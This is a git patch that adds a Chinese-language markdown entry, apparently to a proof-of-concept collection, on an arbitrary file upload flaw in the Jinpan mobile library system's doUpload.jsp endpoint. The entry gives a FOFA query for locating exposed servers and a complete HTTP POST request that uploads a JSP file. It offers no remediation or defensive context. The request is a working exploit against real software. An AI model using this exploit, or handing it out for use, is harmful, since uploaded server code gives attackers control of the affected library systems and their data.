From 93e1b9efb8a2e0f36fee054e9279246a2e407fb6 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 17 Feb 2024 18:04:22 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=87=91=E7=9B=98=E7=A7=BB=E5=8A=A8?= =?UTF-8?q?=E5=9B=BE=E4=B9=A6=E9=A6=86=E7=B3=BB=E7=BB=9F=E5=AD=98=E5=9C=A8?= =?UTF-8?q?=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 金盘移动图书馆系统存在任意文件上传漏洞.md | 27 +++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 金盘移动图书馆系统存在任意文件上传漏洞.md diff --git a/金盘移动图书馆系统存在任意文件上传漏洞.md b/金盘移动图书馆系统存在任意文件上传漏洞.md new file mode 100644 index 0000000..651b706 --- /dev/null +++ b/金盘移动图书馆系统存在任意文件上传漏洞.md @@ -0,0 +1,27 @@ +## 金盘移动图书馆系统存在任意文件上传漏洞 + +金盘图书馆微信管理平台 doUpload.jsp接口存在任意文件上传漏洞,攻击者通过漏洞可以获取权限。 + +## fofa +``` +app="金盘软件-金盘移动图书馆系统" +``` + +## poc +``` +POST /pages/admin/tools/uploadFile/doUpload.jsp HTTP/1.1 +Content-Type: multipart/form-data; boundary=399e563f0389566bd40fd4d6409a67dd +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Host: 127.0.0.1 +Content-Length: 179 +Connection: close + +--399e563f0389566bd40fd4d6409a67dd +Content-Disposition: form-data; name="file"; filename="jILUp0.jsp.jsp" + +<% out.println("lP4pC7HrY"); %> +--399e563f0389566bd40fd4d6409a67dd-- +``` + +![image](https://github.com/wy876/POC/assets/139549762/17f45fd2-35a6-474a-b2ee-c6f49426423a)